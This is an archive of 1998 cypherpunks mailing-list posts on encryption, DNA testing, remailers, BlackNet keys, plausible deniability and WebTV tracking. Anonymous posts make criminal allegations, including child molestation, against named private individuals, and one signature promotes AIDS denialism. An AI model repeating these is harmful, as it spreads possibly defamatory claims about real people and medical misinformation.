> have protein discrepencies which trace back to DNA strands
> that end up different than the original source  organism. As
> the organism develops and ages these issues can become quite 
> important. This aspect of DNA matching has gotten the short 
> shift for sure.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Thu, 15 Oct 1998 01:37:28 +0800
To: xasper8d@lobo.net
Subject: RE: DNA
Message-ID: <8025669D.005D7FCE.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Ok so the genotype is the same (same DNA) but the phenotype is different
(what you see).  It's more complex than
this but there are all sorts of ways that genes express themselves and how
this can be changed.

A good dose of phenol or benzene can do wonders to your genetic material.
A trip to Windscale (sorry Selafield) to
inspect the inside of the reactor vessel etc all has an effect.  DNA
testing would probably never look at
the entire sequence anyway.  It would look at enough to give near unique
markers.  Using a "drill down" technique to
gradually exclude until only one remains.

ie normal number of gene pairs  (not many people live with duff code in
here but there are some)
male vs female   (50%)
blood group
etc
Why use actual matching until you need to, it's expensive.  You get down to
a handful and test those on a wider range of codes.   You hope the samples
are good and the genes haven't been damaged or contaminated.

Don't rely on the science.  The science is our tool NOT us of the science.
We already rely too much on
the technology, science, methods etc.  This is not a scientific way of
working.

Anyway have fun!!

Hwyl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 15 Oct 1998 00:51:25 +0800
To: cypherpunks@toad.com
Subject: Use encryption to foil spooks' data harvesting, says US state dept
Message-ID: <199810141617.SAA07987@replay.com>
MIME-Version: 1.0
Content-Type: text/plain






http://ds.state.gov/documents/protect.doc

Most international U.S. corporate telecommunications are not encrypted.
Some countries do not allow encryption of telecommuni-cations traffic
within their borders, but it should be considered where feasible for any
transmission of competitive information.

Many telecommunications transmissions will contain "key words", used to
identify information of interest to a third party.  A key word can be the
name of a technology, product, project, or anything else which may identify
the subject of the transmission.  

       Encryption should be the first line of defense since it is easier
for foreign intelligence services to monitor lines than to place "bugs",
however encryption will provide little if any security if a careful
examination for audio "bugs" elsewhere in the room is not conducted.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 15 Oct 1998 07:58:28 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: I saw the craziest thing last night...
Message-ID: <199810142343.SAA14539@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



I wanted to share with you an experience perhaps worth contemplating...

Around 8pm or so last nite I got hungry and the dogs looked at me with those
big brown "Help me" eyes and off we trundle to the golden arches. I drive
over the 5-6 blocks to N. Lamar and head north. It's about 2 miles or so
max. As I get to Mickey Dee's I realize that there is a street bum in the
road. There is S. bound traffic and he's about halfway across when I notice
the cars are getting pretty close. Well about this time a vehicle with no
lights (yet it's after dark) but yellow running lights (I believe that's
illegal in this state) begins to continously sound its horn as it approaches
the crosser. No apparent attempt to slow down or change lanes was made. The
car ended up missing the guy by less than 3 ft.

What was really a riot was it was an Austin Police car.

Unfortunately I don't read well backward at night so I didn't get a vehicle
id or a license so this qualifies as nothing more than another net rumor.

It's pretty damn bad when the police resort to assault with a motor vehicle
to control street people.

Can the recent Supreme Court ruling allowing police to kill you in a
high-speed chase as an innocent bystander to protect you from the perp with
complete immunity be extended to pursuit of an unrepentant donut?

When I was a kid it used to say "To Protect and Serve", not "To Protect or
Kill". Isn't the point of a public servant to *serve* the people in a
decent, respectful manner? If taken as a given then it's clear that public
safety *always* takes precedence over 'catch the crook'. It's better to let
the perp run through a neighborhood he's already going to go through and
spend resources getting people into their homes and out of the way than it
is to prove what a dairing-do bunch of local boys can do catching outlaws,
but killing some of the local folks in the process. I appreciate the
potential for hostages (even entire neighborhoods) but please explain how
this ruling changes those instances in any way?

Perhaps we need an amendment that provides a proviso on the rulings of the
Supreme Court. Instead of these sorts of dicta having the weight of law,
which it shouldn't have since it's not legislative, they should be required
to be handed over to Congress for resolution via the normal law making
process. This would limit the Supreme Court to interpretations of existing
law (per the 9th & 10th Amendment).

We definitely need an end to the post-Vietnam, post-Cold War testosterone
rush we're living in now. Like it or not, the more initialy confrontational
the government gets the more violence it will beget. And trying to justify
those strategies by claiming a responce to a rise in violence only begs the
question. Perhaps this realization is at least one reason that the equality
of the federal level, state level, and individual civil rights has become so
critical and so ignored.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 15 Oct 1998 08:08:43 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Limited Impeachment Probes...
Message-ID: <199810142358.SAA14635@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



	The Senate shall have the sole Power to try all Impeachments.  When 
sitting for that Purpose, they shall be on Oath or Affirmation.  When the 
President of the United States is tried, the Chief Justice shall preside: 
and no Person shall be convicted without the Concurrence of two thirds of 
the Members present. 

	Judgment in Cases of Impeachment shall not extend further than to 
removal from Office, and disqualification to hold and enjoy any Office of 
honor, Trust or Profit under the United States: but the Party convicted 
shall nevertheless be liable and subject to Indictment, Trial, Judgment and 
Punishment, according to Law. 

 ---------------------------------------------------------------------------

This would seem to indicate that the only issue a federal prosecutor needs
to be interested in is proving *some* illegal act took place. Not what that
act may have actualy been, though describing it may be required.

Once that is resolved the other legal aspects fall to the attorney general
or district attorney in the appropriate region.

With that in mind, its pretty interesting at all the money and effort that's
been spent on nothing that is materialy relevant to the issue at hand.

Though it is interesting that the issue of profit (running a business?)
comes up in the consequences.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Thu, 15 Oct 1998 07:47:39 +0800
To: cypherpunks@toad.com
Subject: Art Bell
Message-ID: <3.0.2.32.19981014191414.007eb6c0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



Is Art Bell related to Jim Bell?

The following was sent via LibertyWire:

Bell Tolls No More
Wired News Report
http://www.wired.com/news/news/culture/story/15588.html
http://www.artbell.com/artquits.html

2:25 p.m.  13.Oct.98.PDT

Art Bell, the popular host of the late-night
radio show "Coast To Coast AM" is turning
off his microphone indefinitely. 

In Bell's Tuesday morning show he told
listeners, "... a threatening terrible event
tell you about. Because of that event,
and a succession of other events, what
you're listening to right now, is my final
broadcast on the air." 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 15 Oct 1998 02:29:35 +0800
To: cypherpunks@toad.com
Subject: Re: Gary Burnore vs. Earth (Was: Value of Annon. Remailers)
Message-ID: <199810141756.TAA18997@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Missouri FreeNet Administration <sysadmin@mfn.org> wrote:

> First off, let us state up front that this is an aside to the previous
> poster, and not totally on-point: feel free to hit the delete key, and
> accept our apologies if this is a problem.
> 
> About two months ago, we met the infamous Burnore & Company while 
> defending a semi-annonymous UseNet poster calling himself "Outlaw-Frog-Raper".
> It seems that in classical Burnore style "OFR" found himself the sudden
> victim of [literally] daily TOS/SPAM complaints by Burnore and Co. for making
> use of UseNet to air his decidedly anti-police positions (it's odd how "pro
> police" Burnore is, isn't it?).  

Given Gary Burnore's criminal record, he needs all the sucking up to
the police he can get.  In addition to his arrest and conviction for
molesting his girlfriend's daughter in Santa Clara, CA, he was also
arrested for unlawful assembly for his participation in Critical
Mass' bicycle blockade of the streets of San Francisco during rush
hour. (See: http://www.e-media.com/cm/sac.html )

And this criminal has the chutzpah to try and be a net Nazi as well.
This same self-righteous individual once lectured another netizen
about how it's wrong to "fight abuse with abuse".
 
>         Obviously, as defenders of this man's right to post material offensive
> to Burnore, we too came under attack.  Fortunately, we have been with
> our upstream provider for a long time, and are on *very* good terms: they told
> Burnore to keep his complaints to himself.  But I digress...

The best defense against censorious cretins like Gary Burnore is
education.  That's what the victims of the infamous "Rev."  Steve
Winter (who also lives in Raleigh, NC, BTW) had to do to counteract
his abusive tactics.  A "Steve Winter FAQ" was compiled and posted
to Usenet as well as being published on the web.  People who are the
subject of his harassment tactics have something to show to their
ISPs, employers, etc. when Winter makes his bogus threats.

>         As this "war" intensified, we attempted to determine just who in the hell
> this lunatic *was*, as nobody here is a regular Usenet follower (just when
> we have our slow periods, we'll check in with the loons to kill a couple of
> hours...).  To our surprise, we discovered that while Burnore/Databasix/etc.
> are known far and wide, the actual traffic that passes between them and the rest
> of the Earthly population is pretty well eradicated.  Here's a guy who has actually
> sat down and deleted (according to DejaNews) *tens of thousands* of his -own- posts!
> Not to mention the unknown number of posts which he has "thoughtfully taken care of
> for those others who forgot to do so themselves"...

This is the same Gary Burnore who cajoled an anonymous whistleblower
for "hiding behind a remailer" and boasted "I have nothing to hide",
although he himself attempts to gain plausible deniability for his
own posts by preventing an impartial third party from archiving
them, then claiming they were "forged" if he inserted his foot too
far into his mouth.

Not only does Gary hide his own posts behind an X-No-Archive header,
but posts critical of him have a tendency to be cancelled through
forgery.  He screwed up once and cancelled a post critical of him
that was cross-posted to one of the news.admin.net-abuse.* NGs.
Unfortunately for him, an anti-cancel-bot on that NG reposted the
cancelled message along with a copy of the forged cancellation
message sent by ... guess who ...  Gary Burnore!  Oops, Gary, can
you say "busted"?

>         The point here is that what little survives about this lunatic child
> molester (he has even successfully had his North Carolina Sex Offender record
> removed!), has almost all come through *some* annonymizer.  Whether a MixMaster,
> or Cajones (RIP) "intentional annonymizer", or an "unintentional annonymizer" 
> such as a large [cypherpunks] listserv with "bad headers".

By his own account, Gary Burnore spent nearly $30K getting the child
molestation charge plea-bargained down to a misdemeanor.  My guess
is that he has no money left to carry through on his idle threats of
frivolous legal action against those on his lengthy enemies list.
For example, when Jeff Burchell demanded a letter from Gary's lawyer
when he was demanding that Jeff turn over his remailer logs to
DataBasix, what Jeff received was a letter from Gary's girlfriend
Belinda Bryan <eridani@databasix.com> impersonating a lawyer.  For
Jeff's account of that episode, visit:

  http://calvo.teleco.ulpgc.es/listas/cypherpunks@infonex.com/HTML-1997-11/msg00536.html

>         We submit that it only takes one successful argument, even though there be
> a million such arguments available, to "proof" the value of an annoymous remailer.
> we then extend the original Burnore story (presented in part below) in further
> support.

It proves that censorship need not originate with a governmental
body.  All it takes is a determined individual with more time
available to harass than his victims do to defend against it.

> Yes, I know, at least half of you are sitting here going "now why did they
> bother us with that?".  The answer is we feel VERY strongly that if not for
> what [little] we were able to find as a result of A/R's, we would never have
> been able to figure this clown out at all.  And loco though he may be, he is
> also a *prodigious* pain in the ass, who represents a real, true threat to
> what little freedoms we still have in the US.  Burnore isn't a loner in the
> political sense: he's actually becoming pretty mainstream.  If A/R's can help
> to keep scum like him in the light, where he can't hide his hypocrises [sp?]
> through a cancel or "DejaNuke", then they are one of our most important national
> resources, and should be defended (and *funded*) as such!

The problem is that most dissidents have a weak point somewhere
where they are vulnerable, whether it be a censorious hate mail
campaign to his/her ISP or employer, mail bombing, spam baiting,
forged mailing list subscriptions, or one of countless other
denial-of-service attacks that Gary Burnore, Belinda Bryan, Billy
McClatchie (aka "Wotan"), or otther members of the DataBasix abuse
factory can conjure up.

> Just our [very biased] $.02 worth...
> 
> The full-time [yet totally volunteer] staff of Missouri FreeNet:
> 
>         J.A. Terranson, sysadmin@mfn.org
>         John Blau, jb214@mfn.org
>         Beatrice Hynes, beatrice@mfn.org
>         Frescenne "M", support@mfn.org
>         A. Pates, support@mfn.org
> 
> </LURK ON>
> ---------------------------------------------------------------------
> 
> <huge brevity snippage>
> 
> Consider the episode last year with Gary Burnore and DataBasix vs.
> Jeff Burchell and his Mailmasher and Huge Cajones machines.
> Made-to-order abuse appeared right on cue to reinforce the claims
> that Burnore and his girlfriend Belinda Bryan had made.  And now
> we've learned the real truth behind the whole episode.  While Gary
> Burnore was living with another girlfriend in Santa Clara, CA, he
> was also molesting her teenaged daughter.  An anonymous
> whistleblower attempted to warn the girl's mother as well as her
> school officials by anonymous e-mail.  Burnore went ballistic and
> falsely claimed "harassment".  But the whistleblower was ultimately
> vindicated when Burnore pled guilty to the molestation charge, was
> placed on probation, and was required to register as a sex offender.
> Unable to silence the whistleblower, Burnore began a campaign of
> harassment against the operators of the remailers that were being
> used to expose him.  IOW, if you can't refute the message, shoot the
> messenger.  And if you can't shoot the messenger, attempt to disable
> his means of communication (the remailers net).
> 
> I recounted this case history, which can be researched in various
> usenet archives by anyone interested, just to demonstrate that one
> man's "harassment" can well be another man's investigative
> journalism, even if the journalist or whistleblower is not in a
> position to expose him/herself to retaliation by the wrongdoer,
> which has been (coincidentally?) reported by virtually anyone who
> has dared to challenge Gary Burnore publicly.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 15 Oct 1998 11:35:27 +0800
To: cypherpunks-unedited@toad.com>
Subject: Re: LUGGAGE, GARMENT BAGS, BREIFCASES, ETC.
In-Reply-To: <199810150039.RAA24551@toad.com>
Message-ID: <v03130310b24b143275bb@[209.66.100.146]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:07 AM -0700 10/15/98, sendus@earthcorp.com wrote:
>Dear reader,
>
>We have just visited your website and became interested to develop a
>trading relationship with you company.
>
>We are a major manufacturer of a full range of luggage, bags, and
>trolleys.For full details
>mailto:sendus@earthcorp.com?Subject=BESTPLUS_IDUSTRIES_LTD.
>
>Thank you very much,
>
>Ms. Anges Lek,
>Managing Director
>

Thank you for posting this to our list!

We are very interested in specialized types of luggage. We seek suitcases
and briefcases in which various items may be hidden. The usual items:
money, papers, drugs, chemicals, and various pyrotechnic assemblies.

Please describe your experience in fabricating such items, and please list
some of your more famous clients.

Warning: We have very high standards! The luggage we use now has been used
to export the PGP source code disks to Finland and Holland, and such
esteemed travellers as Pablo Escobar, Abu Nidal, and the Engineer have used
the same products we use.

We look forward to your reply.

--Asama bin May, Director of Delivery Operations, World Liberation Front






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 15 Oct 1998 09:46:58 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: DNA (fwd)
Message-ID: <199810150122.UAA15016@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: DNA (fwd)
> Date: Wed, 14 Oct 1998 18:04:32 -0700

> Monozygotic [maternal] twins do have the same DNA. Hence they are
> identical.

In my earlier post I got the naming on the type of twin incorrect, it
shouldn't have been identical. I was trying to explain that aspect in the
second paragraph. My mistake.

> Clones on the otherhand and have identical nuclear DNA, but are not
> necessarily identical because some early development processes rely on
> maternal genome material and not nuclear DNA, and depending on the
> cloning process they may have different mitochondrial DNA (mtDNA).

I assume the mitochondrial differences are due to nucleus swapping,
different line of extra-nuclear heritage?


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@gnu.org>
Date: Thu, 15 Oct 1998 09:10:41 +0800
To: aba@dcs.ex.ac.uk
Subject: Re: overlapping aims -- cypherpunks/FSF (Re: Two? ways people could use your code)
In-Reply-To: <199810141057.LAA28762@server.eternity.org>
Message-ID: <199810150056.UAA07890@psilocin.gnu.org>
MIME-Version: 1.0
Content-Type: text/plain



    Would you be interested in publishing GNUPG, and other GNU crypto
    utilities and libraries under GNU LGPL?

We might use the LGPL for some of these libraries.  The decision
depends on the details of the situation for any particular library, so
I don't want to try to decide in advance.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 15 Oct 1998 03:39:30 +0800
To: cypherpunks@toad.com
Subject: Re: Gary Burnore vs. Earth (Was: Value of Annon. Remailers)
Message-ID: <199810141901.VAA27568@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Information Security <guy@panix.com> wrote:

>    >   From: Missouri FreeNet Administration <sysadmin@mfn.org>
>    >
>    >   Obviously, as defenders of this man's right to post material offensive
>    >   to Burnore, we too came under attack.
> 
> One man's attack is another's defense.

I'll have to remember that one.  Some defense lawyers in Wyoming
might want to use it in their clients' trial for their "defense"
against that gay student.

Now about Gary Burnore's "defense" against the underaged daughter of
his girlfriend...

>    >    The point here is that what little survives about this lunatic child
>    >   molester (he has even successfully had his North Carolina Sex Offender record
>    >   removed!),...
> 
> Gee, why don't you ask North Carolina why, in writing?

Irrelevant.  The North Carolina website of registered sex offenders
was only the vehicle by which the truth about Gary Burnore's
existing conviction in California became known.  Depublishing it in
NC on some technicality doesn't alter the fact of the original
offense for which Gary Burnore pled guilty in a Santa Clara, CA
court, which sentenced him to probation and required him to register
as a sex offender.

And given Burnore's pattern of harassment ... er, "defense" ... of
those who criticize him, the ability of someone with knowledge of
the facts to freely speak without fear of retaliation enabled the
public to learn the truth.  Perhaps the original whistleblower's
e-mailed warnings led or contributed to Burnore's arrest, and to the
resulting psychiatric treatment which may have protected future
potential victims.

> Let us know when you have an original thought.

Ad hominem often comes in handy...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 15 Oct 1998 05:30:13 +0800
To: cypherpunks@toad.com
Subject: hey DIRNSA: can't talk to allies
Message-ID: <199810142054.WAA13575@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




COMMUNICATIONS SECURITY 

TITLE: COMSEC - Secure Voice Telephones 

LESSON LEARNED: NATO elements must learn to use the standard secure
telephones. 

BACKGROUND: For future NATO-led operations, it must be stressed that the
NATO secure telephone standard is the STU IIB.
Augmenting forces must bring compatible equipment if it stays under
national control. Must come to grips with the US and NATO
secure telephones within the command. 

There are problems associated with US and NATO secure telephones: The STU
III/STU IIIA has not been released to NATO, so they
should be eliminated from the NATO comm system. The NATO standard is the
STU IIIB, only the STU IIB is compatible with the
STU IIIA. Cannot adhere to US security regulations for protecting US secure
voice systems in an allied environment. 

RECOMMENDATION: Consider a letter to DIRNSA requesting relaxation of
current US policy. 

http://call.army.mil/call/spc%5Fprod/5sigcd/2tact.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Thu, 15 Oct 1998 12:34:48 +0800
To: Tim May <tcmay@got.net>
Subject: Re: LUGGAGE, GARMENT BAGS, BREIFCASES, ETC.
In-Reply-To: <199810150039.RAA24551@toad.com>
Message-ID: <3.0.2.32.19981015000807.007e6a40@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Slow night for ya, eh Tim? I wonder why people waste keystrokes on 
this crap (like I am). How's the survivalist thing going? Don't you 
live out there near Taft. Any thought on the recent ATF raid?

In Liberty

Edwin

At 07:58 PM 10/14/98 -0700, you wrote:
>At 5:07 AM -0700 10/15/98, sendus@earthcorp.com wrote:
>>Dear reader,
>>
>>We have just visited your website and became interested to develop 
a
>>trading relationship with you company.
>>
>>We are a major manufacturer of a full range of luggage, bags, and
>>trolleys.For full details
>>mailto:sendus@earthcorp.com?Subject=BESTPLUS_IDUSTRIES_LTD.
>>
>>Thank you very much,
>>
>>Ms. Anges Lek,
>>Managing Director
>>
>
>Thank you for posting this to our list!
>
>We are very interested in specialized types of luggage. We seek 
suitcases
>and briefcases in which various items may be hidden. The usual 
items:
>money, papers, drugs, chemicals, and various pyrotechnic assemblies.
>
>Please describe your experience in fabricating such items, and 
please list
>some of your more famous clients.
>
>Warning: We have very high standards! The luggage we use now has 
been used
>to export the PGP source code disks to Finland and Holland, and such
>esteemed travellers as Pablo Escobar, Abu Nidal, and the Engineer 
have used
>the same products we use.
>
>We look forward to your reply.
>
>--Asama bin May, Director of Delivery Operations, World Liberation 
Front
>
>
>
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNiV1JkmNf6b56PAtEQK5ywCggnfERwJiLn58xXzHKYtKXB3skNAAnjOy
kTzcFy0QtrJz9KT5Heuzcq3w
=iNaM
-----END PGP SIGNATURE-----


When freedom is outlawed.......Only outlaws will be free!

If cryptography is outlawed, pomz pvumbxt xjmm ibwf dszquphsbqiz.

Fun! Fast! Revealing! Try "The World's Smallest Political Quiz" at:
   http://www.self-gov.org/quiz.html

IS AIDS A GOVERNMENT/DRUG COMPANY HOAX?
   http://www.virusmyth.com/aids/index.htm

When you blame others, you give up your power to change.
Dr. Robert Anthony

Libertarian Party of Hillsborough County, FL
   http://home.tampabay.rr.com/lphc

When a place gets crowded enough to require ID's, social collapse is not far
away. It is time to go elsewhere. The best thing about space travel is that
it made it possible to go elsewhere.

Lazarus Long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 15 Oct 1998 16:03:21 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: Strom Thurmond Drafts Bill Prohibiting Telegraph Porn
Message-ID: <3.0.5.32.19981015003439.008c35b0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain




Strom Thurmond Drafts Bill Prohibiting Telegraph Porn

http://www.theonion.com/onion3408/telegraphporn.html

Strom Thurmond Drafts Bill Prohibiting Telegraph Porn

      WASHINGTON, DC--Contending that morse-coded descriptions of
improperly petticoated young ladies are undermining the morals of American
boys yet in short pants, U.S. Sen. Strom Thurmond (R-SC) proposed
legislation Monday banning telegraph porn.

      "My friends, this revolutionary new 'Tele-graph' technology, by which
messages are transmitted across vast distances via cable wire, is indeed a
wondrous device," Thurmond told fellow members of the Senate. "But certain
telegraphers--most corrupt and foul telegraphy men indeed--have debased Mr.
Morse's code by using its ingenious dots and dashes to transmit
porno-graphs describing flagrantly uncorseted womenfolk. I submit to you,
gentlemen, that laws be passed to prevent the tele-graph device from
becoming a machine of ill repute!"

      Thurmond's proposed legislation would establish stiff penalties for
the transmission of certain obscene words and phrases along Western Union's
telegram and telegraph wires, including "merry-widow," "bosom," and
"underthings," as well as prohibit the use of the word "legs" instead of
"limbs" when referring to the female anatomy. In certain contexts, the
words"disheveled" and "heaving" would also be regarded as violations of the
law, with perpetrators subject to fines of $50 or seven years hard labor on
the proposed trans-American steam railroad.

      "As our nation recovers from the depredations and ruin of the recent
War Of Northern Aggression, we must not permit the tele-graph to become the
Devil's instrument," said Thurmond, 95. "Mr. Morse's messaging device must
not be allowed to corrupt the hearts and minds of the Republic's youths!"


[...more...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 15 Oct 1998 09:46:52 +0800
To: minow@pobox.com
Subject: Re: ATTN: BlackNet, sog's keys 4 sale
In-Reply-To: <v03102816b24a724036ee@[17.219.105.162]>
Message-ID: <199810150105.CAA02529@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Martin Minow <minow@pobox.com> writes:
> Adam Back <aba@dcs.ex.ac.uk> notes that the "Toto death thread"
> posting was signed using the "son of Gomer" Blacknet key that
> was broken by Paul Leyland (read through the past few days of the
> archives to get the context).

Note the `son of gomez' key was _encrypted with_ the Blacknet key.
Toto/anonymous was submitting his information for sale to Blacknet, so
he used a `digital dead drop' -- encrypted with Blacknet's key and
posted in a public place (cypherpunks), however he (it appears
intentionally) used the weak 384 bit Blacknet key which Paul Leyland's
announce claims was created by Larry Detweiler.

Also note that Paul Leyland (and Alec Muffett, Arjen Lenstra, Jim
Gillogly) factored that key a _long_ time ago, Jun 1995 (see the Date
on the attachment of the announce to one of my earlier posts.)

Perhaps you understood that, but what you wrote (son of Gomer Blacknet
key?) was confusing.

> Adam notes: "Implications?  Others had CJs keys?  Toto is someone
> other than CJ?"
> 
> One other implication to consider: you might be able to attain
> semi-deniability by siging a message with a key that is breakable
> by an adversity with govermental resources (to use an euphamism)
> but not by an ordinary, presumably less motivated, cracker.

This is similar to the time-delay crypto proposals made by Tim May and
more lately David Wagner, (and some other authors who I forget, I
think Schneier).  One of the time-delay crypto protocols is to encrypt
the information one wants to a time-delayed release of with weak
encryption requiring the approximate amount of time you wish to delay
to break.

'Course it doesn't work in general because it depends entirely on the
resources of the attacker.  Really you need a third party to publish
private keys at delayed intervals.

But for your suggested applicatoin -- plausible deniability for
`speaking truth to kings' -- it works fine, because that's the point,
plausible deniability against well resourced attackers (you are in
trouble if well resourced attackers are interested in you anyway), but
some value to the signature for low resourced attackers.

Other ways to provide plausible deniability is to not sign public
posts, and to use non-transferable signatures for private email.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 15 Oct 1998 10:43:36 +0800
To: minow@pobox.com
Subject: plausible deniability (Re: ATTN: BlackNet, sog's keys 4 sale)
In-Reply-To: <199810150105.CAA02529@server.eternity.org>
Message-ID: <199810150200.DAA02609@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




I wrote discussing plausible deniability for public postings:
> But for your suggested applicatoin -- plausible deniability for
> `speaking truth to kings' -- it works fine, because that's the point,
> plausible deniability against well resourced attackers (you are in
> trouble if well resourced attackers are interested in you anyway), but
> some value to the signature for low resourced attackers.
> 
> Other ways to provide plausible deniability is to not sign public
> posts, and to use non-transferable signatures for private email.

I missed from this list of approaches for plausible deniability the
canonical cypherpunks approach: post anonymously :-)

The other way is perhaps to have shared identities, such as Monty
Cantsin claimed to be, and such as perhaps Toto has been on occasion.

Adam
-- 
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 15 Oct 1998 16:55:16 +0800
To: cypherpunks@einstein.ssz.com
Subject: More Mickyshit via WebTV
Message-ID: <199810150837.DAA116.67@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Forward from the SpyKing Mailing List.

**************************************************************** Subject:
Web TV owns your cache

http://www.usatoday.com/life/cyber/zd/zd7.htm
10/12/98- 
WebTV is watching you
From: Inter@ctive Week Online

Microsoft Corp.'s WebTV Networks Inc. is quietly using a system-polling
feature that can extrapolate subscriber information from each of its
450,000 users to better serve advertisers, said Steve Perlman, president
of WebTV. 

The polling, which takes place nightly, uploads television and Web site
viewing habits back to the system. The data makes it possible for WebTV to
scrutinize not only what subscribers are watching, but also what they are
clicking on or surfing away from, Perlman said. The polling results are
offered to advertisers in an aggregate format;  however, because results
are grouped by ZIP code and contain demographic data compiled from WebTV
viewers' polls, it can help them target ads more effectively. 

"We have a whole department that does nothing but look at the information.
If someone is watching a car ad and clicks through, we can send them to
the closest car dealership Web site," Perlman said.  "The balance is
providing advertisers with useful information while still protecting the
subscribers." WebTV already protects its subscribers from Internet cookies
- -- markers that track what sites people visit on the Web. 

"I don't think people understand the extent of this. It's recording
everything they do. This is like having a video camera on them 24 hours a
day," said Tom Rheinlander, an analyst at Forrester Research Inc. 

The polling will take a giant step into the realm of cable TV in 1999.
Tele-Communications Inc. and other cable operators are expected to deploy
more than 5 million set-top boxes that will ship with Windows CE and the
Solo chip, bringing WebTV to cable. 

Today, WebTV informs its subscribers about the polling. Next year, Perlman
said, customers will have the option of turning individual tracking on and
off at will. This will allow advertisers to send ads to single households,
not just ZIP codes. 

Sean Kaldor, vice president of International Data Corp.'s Consumer Device
Research, said this could translate into greater ad revenue for Microsoft.
 "But it could also work out well for subscribers.  They may get lower or
free subscriptions for enabling this level of tracking," Kaldor said. "Is
it going to happen? I doubt it, but it's a nice thought." 

By Karen J. Bannan

****************************************************************


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: The best way to accelerate Windows is at escape velocity.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNiW0Lo9Co1n+aLhhAQEx6AP+IRmscdFFOxXJBi31Xjp6r/EJJHPsv2uq
yaXc+s+30yElGUFh056wr8MPJndwz76zG5ZfsDQmEG4ok9w0zT/2xeC7kve6FX4t
RImLpTQxpK9R6voxIhlmXk2nCy8IcrZ74zY16ckdKopmobTT7d9Ry6pgohXAyS75
fbRhHuixtUI=
=dZbh
-----END PGP SIGNATURE-----





